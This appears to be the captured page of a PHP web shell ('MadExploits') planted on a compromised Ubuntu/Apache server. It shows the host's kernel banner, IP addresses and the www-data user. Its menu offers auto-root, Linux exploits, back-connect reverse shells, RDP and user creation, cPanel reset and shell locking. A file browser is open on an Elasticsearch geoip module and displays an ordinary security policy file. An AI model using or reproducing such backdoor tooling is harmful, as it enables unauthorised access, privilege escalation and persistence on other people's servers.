Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.63.181
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
elasticsearch /
modules /
ingest-geoip /
[ HOME SHELL ]
Name
Size
Permission
Action
GeoLite2-ASN.mmdb
6.3
MB
-rw-r--r--
GeoLite2-City.mmdb
59.98
MB
-rw-r--r--
GeoLite2-Country.mmdb
3.8
MB
-rw-r--r--
geoip2-2.13.1.jar
48.57
KB
-rw-r--r--
ingest-geoip-7.15.1.jar
96.19
KB
-rw-r--r--
jackson-annotations-2.10.4.jar
66.49
KB
-rw-r--r--
jackson-databind-2.10.4.jar
1.34
MB
-rw-r--r--
maxmind-db-1.3.1.jar
22.84
KB
-rw-r--r--
plugin-descriptor.properties
1.71
KB
-rw-r--r--
plugin-security.policy
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plugin-security.policy
/* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License * 2.0 and the Server Side Public License, v 1; you may not use this file except * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ grant { // needed because jackson-databind is using Class#getDeclaredConstructors(), Class#getDeclaredMethods() and // Class#getDeclaredAnnotations() to find all public, private, protected, package protected and // private constructors, methods or annotations. Just locating all public constructors, methods and annotations // should be enough, so this permission wouldn't then be needed. Unfortunately this is not what jackson-databind does // or can be configured to do. permission java.lang.RuntimePermission "accessDeclaredMembers"; // Also needed because of jackson-databind: permission java.lang.reflect.ReflectPermission "suppressAccessChecks"; permission java.net.SocketPermission "*", "connect"; };
Close